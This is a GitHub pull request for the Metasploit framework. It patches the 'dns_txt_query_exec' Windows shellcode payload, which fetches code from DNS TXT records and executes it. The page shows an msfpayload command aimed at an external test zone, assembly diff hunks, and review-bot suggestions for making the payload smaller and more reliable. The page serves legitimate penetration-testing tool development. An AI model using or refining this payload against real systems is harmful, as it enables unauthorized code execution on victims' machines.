Improved payload dns_txt_query_exec #1057

Merged
merged 16 commits into from

3 participants

@corelanc0d3r

Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at corelan.eu:

./msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C

(you should get a messagebox)

@corelanc0d3r

Tested on Win2003 R2 SP2 as well; works fine.

@ChrisJohnRiley

Is this an extension of what we were working on in April? If so, just let me know if you want the server-side delivery code.

@corelanc0d3r

This is a bugfix to the existing module (which simply downloads a payload). The modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again and see what needs to be done to make them work reliably.

@ChrisJohnRiley

OK, sorry, didn't want to hijack the thread... Let's chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming

@corelanc0d3r

What? Is it evening already? :)

@wchen-r7

Tested ok on Windows 7 SP1.

@wchen-r7 merged commit 0bf92b5 into rapid7:master

1 check passed: the Travis build passed.
Commits (16 in total, all by @corelanc0d3r):

  Oct 24, 2012: 1 commit ("merge")
  Oct 29, 2012: 1 commit
  Oct 30, 2012: 2 commits
  Oct 31, 2012: 1 commit
  Nov 3, 2012: 1 commit
  Nov 6, 2012: 1 commit
  Nov 7, 2012: 2 commits (second: "restored original file")
  Nov 8, 2012: 2 commits
  Nov 9, 2012: 2 commits
  Nov 12, 2012: 3 commits
Showing with 7 additions and 7 deletions.
  1. +7 −7 modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
start:
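Review bot: `jmp.i8 next_mod` forces the 2-byte short encoding, so the assembler will reject the module outright if `next_mod` ever ends up more than 127 bytes away from this instruction instead of silently emitting a longer payload; a one-line comment next to the jump (or on the `next_mod` label) saying that the distance is deliberately kept within short-jump range would stop a later edit to the module-walk loop from turning into a confusing assembly error. The same applies to the other `jmp.i8` sites introduced in this patch.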
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
dnsquery:
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
get_dnsname_return:
pop eax ; get ptr to dnsname (lpstrName)
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
get_dnsname:
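Review bot: if Metasm was emitting the near form for `jnz jump_to_payload` the way it did for the plain `jmp`s replaced in this patch, `jnz.i8 jump_to_payload` would save bytes here as well, provided `jump_to_payload` is within short-jump range; worth checking, since the point of the `jmp.i8` change is size. The comment pair `query ok ?` / `no, jump to payload` also reads backwards at first glance and only works because a non-zero `eax` from the `call ebp` is the failure case, so spelling that out (`eax != 0 : query failed`) on the `jnz` line would help.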
@@ -225,9 +225,9 @@ def generate
get_query_result:
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
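Review bot: the new test reads `[bufferreg+0x18]` and compares it against a bare `1`, but the comment only restates the offset and the constant; since this is the actual crash fix (the old code keyed on the first dword of the result being non-null), the comment should say which field of the DNS result record lives at +0x18 and why exactly 1 is the continue condition, otherwise the next person touching the record layout has nothing to go on. Minor size point, given that the PR also aims to shrink the payload: `cmp eax,1` / `jne prepare_payload` can be written `dec eax` / `jnz prepare_payload`, which is two bytes shorter and still NULL-free; `eax` is not used again in the visible lines of this hunk, but confirm that `prepare_payload` does not rely on it before applying that.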
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
prepare_payload:
mov #{bufferreg},edx
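Review bot: `inc ebx` advances the sequence character with no upper bound, and the loop starts at `mov bl,0x61` ('a'), so after 26 pieces the query label runs past 'z' into punctuation; if a zone is expected to hold more than 26 chunks the loop needs to wrap or widen the label, and if not, the 26-chunk limit belongs in the module's documentation. Also, `jmp.i8 dnsquery` is a backward short jump across the entire fetch-and-copy loop, so it is the tightest of the forced short jumps in this patch: any growth of the loop body past 127 bytes will fail assembly here first, which is worth a comment on this line.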